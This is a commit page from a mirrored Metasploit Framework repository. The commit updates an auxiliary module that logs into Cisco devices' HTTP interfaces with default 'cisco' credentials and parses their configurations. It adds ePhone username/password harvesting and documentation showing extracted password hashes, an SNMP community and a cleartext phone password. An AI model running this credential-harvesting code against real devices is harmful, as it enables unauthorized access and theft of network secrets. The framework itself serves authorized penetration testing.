infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #10798, Cisco device manager update

4.x
Jeffrey Martin 2018-12-03 01:39:19 -06:00 committed by Metasploit
parent 16184573cc
commit 73724f111b
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
3 changed files with 83 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

47
documentation/modules/auxiliary/scanner/http/cisco_device_manager.md Normal file
View File

@ -0,0 +1,47 @@
## Description
This module scans for the presence of the HTTP interface for a cisco device and attempts to enumerate it using basic authentication.
## Vulnerable Application
Any Cisco networking device with the HTTP inteface turned on.
## Verification Steps
1. Enable the web interface on a cisco device `ip http server`
2. Start msfconsole
3. Do: ```use auxiliary/scanner/http/cisco_device_manager```
4. Do: ```set RHOSTS [IP]```
5. Do: ```run```
## Options
**HttpUsername**
Username to use for basic authentication. Default value is `cisco`
**HttpPassword**
Password to use for basic authentication. Default value is `cisco`
## Scenarios
### Tested on Cisco UC520-8U-4FXO-K9 running IOS 12.4
```
msf5 > use auxiliary/scanner/http/cisco_device_manager
msf5 auxiliary(scanner/http/cisco_device_manager) > set rhosts 2.2.2.2
rhosts => 2.2.2.2
msf5 auxiliary(scanner/http/cisco_device_manager) > set vebose true
vebose => true
msf5 auxiliary(scanner/http/cisco_device_manager) > run
[+] 2.2.2.2:80 Successfully authenticated to this device
[+] 2.2.2.2:80 Processing the configuration file...
[+] 2.2.2.2:80 MD5 Encrypted Enable Password: $1$TF.y$3E7pZ2szVvQw5JG8SDjNa1
[+] 2.2.2.2:80 Username 'cisco' with MD5 Encrypted Password: $1$DaqN$iP32E5WcOOui/H66R63QB0
[+] 2.2.2.2:80 SNMP Community (RO): public
[+] 2.2.2.2:80 ePhone Username 'phoneone' with Password: 111111
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

42
lib/msf/core/auxiliary/cisco.rb
View File

@ -71,7 +71,7 @@ module Auxiliary::Cisco
def cisco_ios_config_eater(thost, tport, config)
credential_data = {
address: thost,
port: tport,
@ -125,7 +125,7 @@ module Auxiliary::Cisco
shash = cisco_ios_decrypt7(shash) rescue shash
print_good("#{thost}:#{tport} Decrypted Enable Password: #{shash}")
store_loot("cisco.ios.enable_pass", "text/plain", thost, shash, "enable_password.txt", "Cisco IOS Enable Password")
cred = credential_data.dup
cred[:private_data] = shash
cred[:private_type] = :password
@ -168,27 +168,27 @@ module Auxiliary::Cisco
spass = cisco_ios_decrypt7(spass) rescue spass
print_good("#{thost}:#{tport} Decrypted VTY Password: #{spass}")
cred = credential_data.dup
cred[:private_data] = spass
cred[:private_type] = :password
create_credential_and_login(cred)
when /^\s*(password|secret) 5 (.*)/i
shash = $2.strip
print_good("#{thost}:#{tport} MD5 Encrypted VTY Password: #{shash}")
store_loot("cisco.ios.vty_password", "text/plain", thost, shash, "vty_password_hash.txt", "Cisco IOS VTY Password Hash (MD5)")
cred = credential_data.dup
cred[:private_data] = shash
cred[:private_type] = :nonreplayable_hash
create_credential_and_login(cred)
when /^\s*password (0 |)([^\s]+)/i
spass = $2.strip
print_good("#{thost}:#{tport} Unencrypted VTY Password: #{spass}")
cred = credential_data.dup
cred[:private_data] = spass
cred[:private_type] = :nonreplayable_hash
@ -249,7 +249,7 @@ module Auxiliary::Cisco
cred[:private_data] = spass
cred[:private_type] = :nonreplayable_hash
create_credential_and_login(cred)
when /^\s*interface tunnel(\d+)/i
tuniface = $1
@ -259,24 +259,24 @@ module Auxiliary::Cisco
print_good("#{thost}:#{tport} GRE Tunnel Key #{spass} for Interface Tunnel #{siface}")
store_loot("cisco.ios.gre_tunnel_key", "text/plain", thost, "tunnel#{siface}_#{spass}", "gre_tunnel_key.txt", "Cisco GRE Tunnel Key")
cred = credential_data.dup
cred[:private_data] = spass
cred[:private_type] = :nonreplayable_hash
create_credential_and_login(cred)
when /^\s*ip nhrp authentication ([^\s]+)/i
spass = $1
siface = tuniface
print_good("#{thost}:#{tport} NHRP Authentication Key #{spass} for Interface Tunnel #{siface}")
store_loot("cisco.ios.nhrp_tunnel_key", "text/plain", thost, "tunnel#{siface}_#{spass}", "nhrp_tunnel_key.txt", "Cisco NHRP Authentication Key")
cred = credential_data.dup
cred[:private_data] = spass
cred[:private_type] = :nonreplayable_hash
create_credential_and_login(cred)
#
# Various authentication secrets
@ -317,6 +317,20 @@ module Auxiliary::Cisco
create_credential_and_login(cred)
end
# This regex captures ephones from Cisco Unified Communications Manager Express (CUE) which come in forms like:
# username "phonefour" password 444444
# username test password test
# This is used for the voicemail system
when /^\s*username (?:")([^\s]+)(?:") password ([^\s]+)/i
user = $1
spass = $2
print_good("#{thost}:#{tport} ePhone Username '#{user}' with Password: #{spass}")
store_loot("cisco.ios.ephone.username_password", "text/plain", thost, "#{user}:#{spass}", "ephone_username_password.txt", "Cisco IOS ephone Username and Password")
cred = credential_data.dup
cred[:private_data] = spass
cred[:private_type] = :nonreplayable_hash
create_credential_and_login(cred)
when /^\s*username ([^\s]+) (secret|password) (\d+) ([^\s]+)/i
user = $1
stype = $3.to_i
@ -361,7 +375,7 @@ module Auxiliary::Cisco
if stype == 5
print_good("#{thost}:#{tport} PPP Username #{suser} MD5 Encrypted Password: #{spass}")
store_loot("cisco.ios.ppp_username_password_hash", "text/plain", thost, "#{suser}:#{spass}", "ppp_username_password_hash.txt", "Cisco IOS PPP Username and Password Hash (MD5)")
cred = credential_data.dup
cred[:private_data] = spass
cred[:private_type] = :nonreplayable_hash
@ -371,7 +385,7 @@ module Auxiliary::Cisco
if stype == 0
print_good("#{thost}:#{tport} PPP Username: #{suser} Password: #{spass}")
store_loot("cisco.ios.ppp_username_password", "text/plain", thost, "#{suser}:#{spass}", "ppp_username_password.txt", "Cisco IOS PPP Username and Password")
cred = credential_data.dup
cred[:private_data] = spass
cred[:private_type] = :nonreplayable_hash

10
modules/auxiliary/scanner/http/cisco_device_manager.rb
View File

@ -21,7 +21,7 @@ class MetasploitModule < Msf::Auxiliary
'Name' => 'Cisco Device HTTP Device Manager Access',
'Description' => %q{
This module gathers data from a Cisco device (router or switch) with the device manager
web interface exposed. The USERNAME and PASSWORD options can be used to specify
web interface exposed. The HttpUsername and HttpPassword options can be used to specify
authentication.
},
'Author' => [ 'hdm' ],
@ -33,6 +33,11 @@ class MetasploitModule < Msf::Auxiliary
[ 'OSVDB', '444'],
],
'DisclosureDate' => 'Oct 26 2000'))
register_options(
[
OptString.new('HttpUsername', [true, 'The HTTP username to specify for basic authentication', 'cisco']),
OptString.new('HttpPassword', [true, 'The HTTP password to specify for basic authentication', 'cisco'])
])
end
def run_host(ip)
@ -54,9 +59,10 @@ class MetasploitModule < Msf::Auxiliary
if res and res.body and res.body =~ /Cisco (Internetwork Operating System|IOS) Software/
print_good("#{rhost}:#{rport} Successfully authenticated to this device")
store_valid_credential(user: datastore['HttpUsername'], private: datastore['HttpPassword'])
# Report a vulnerability only if no password was specified
if datastore['PASSWORD'].to_s.length == 0
if datastore['HttpPassword'].to_s.length == 0
report_vuln(
{